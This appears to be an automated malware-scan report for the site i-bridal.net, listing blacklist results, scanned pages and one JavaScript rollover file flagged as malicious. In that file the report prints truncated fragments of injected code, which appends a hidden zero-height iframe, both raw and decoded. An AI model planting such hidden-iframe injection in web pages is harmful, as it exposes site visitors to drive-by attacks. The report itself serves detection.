Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=i-bridal.net
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://i-bridal.net/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://i-bridal.net/ | 200 OK Content-Length: 9192 Content-Type: text/html | clean |
http://i-bridal.net/./common/js/smartRollover.js | 200 OK Content-Length: 8094 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function smartRollover() { if(document.getElementsByTagName) { var images = document.getElementsByTagName("img"); for(var i=0; i < images.length; i++) { if(images[i].getAttribute("src").match("_off.")) { images[i].onmouseover = function() { this.setAttribute("src", this.getAttribute("src").replace("_off.", "_on.")); } images[i].onmouseout = function() { this.setAttribute("src", this.getAttribute("src").replace("_on.", "_ if(f)e(s);}
Decoded script:
function smartRollover() { if (document.getElementsByTagName) { var images = document.getElementsByTagName("img"); for (var i = 0; i < images.length; i++) { if (images[i].getAttribute("src").match("_off.")) { images[i].onmouseover = function () {this.setAttribute("src", this.getAttribute("src").replace("_off.", "_on."));}; images[i].onmouseout = function () {this.setAttribute("src", this.getAttribute( ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see
Antivirus reports:
http://i-bridal.net/0101_service.html | 200 OK Content-Length: 10689 Content-Type: text/html | clean |
http://i-bridal.net/common/js/smartRollover.js | 200 OK Content-Length: 8094 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function smartRollover() { if(document.getElementsByTagName) { var images = document.getElementsByTagName("img"); for(var i=0; i < images.length; i++) { if(images[i].getAttribute("src").match("_off.")) { images[i].onmouseover = function() { this.setAttribute("src", this.getAttribute("src").replace("_off.", "_on.")); } images[i].onmouseout = function() { this.setAttribute("src", this.getAttribute("src").replace("_on.", "_ if(f)e(s);}
Decoded script:
function smartRollover() { if (document.getElementsByTagName) { var images = document.getElementsByTagName("img"); for (var i = 0; i < images.length; i++) { if (images[i].getAttribute("src").match("_off.")) { images[i].onmouseover = function () {this.setAttribute("src", this.getAttribute("src").replace("_off.", "_on."));}; images[i].onmouseout = function () {this.setAttribute("src", this.getAttribute( ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see
Antivirus reports:
http://i-bridal.net/index.html | 200 OK Content-Length: 9192 Content-Type: text/html | clean |
http://i-bridal.net/0201_sample.html | 200 OK Content-Length: 7820 Content-Type: text/html | clean |
http://i-bridal.net/0301_price.html | 200 OK Content-Length: 9002 Content-Type: text/html | clean |
http://i-bridal.net/0401_appli.html | 200 OK Content-Length: 9168 Content-Type: text/html | clean |
http://i-bridal.net/0501_qa.html | 200 OK Content-Length: 13700 Content-Type: text/html | clean |
http://i-bridal.net/0601_inq.html | 200 OK Content-Length: 5269 Content-Type: text/html | clean |
http://i-bridal.net/1001_guide.html | 404 Not Found Content-Length: 290 Content-Type: text/html | clean |
http://i-bridal.net/test404page.js | 404 Not Found Content-Length: 289 Content-Type: text/html | clean |
http://i-bridal.net/1002_privacy.html | 200 OK Content-Length: 6360 Content-Type: text/html | clean |
http://i-bridal.net/1003_rule.html | 200 OK Content-Length: 12838 Content-Type: text/html | clean |
http://i-bridal.net/0402_appliform.html | 200 OK Content-Length: 18439 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: i-bridal.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Aug 2014 01:25:19 GMT
Accept-Ranges: bytes
ETag: "cc681a1-23e8-493be8ad31040"
Server: Apache/2.2.3 (CentOS)
Content-Length: 9192
Content-Type: text/html
Last-Modified: Fri, 29 Oct 2010 10:01:29 GMT
X-Powered-By: PleskLin
...9192 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: i-bridal.net
Referer: http://www.google.com/search?q=i-bridal.net
Result:
The result is similar to the first query. There are no suspicious redirects found.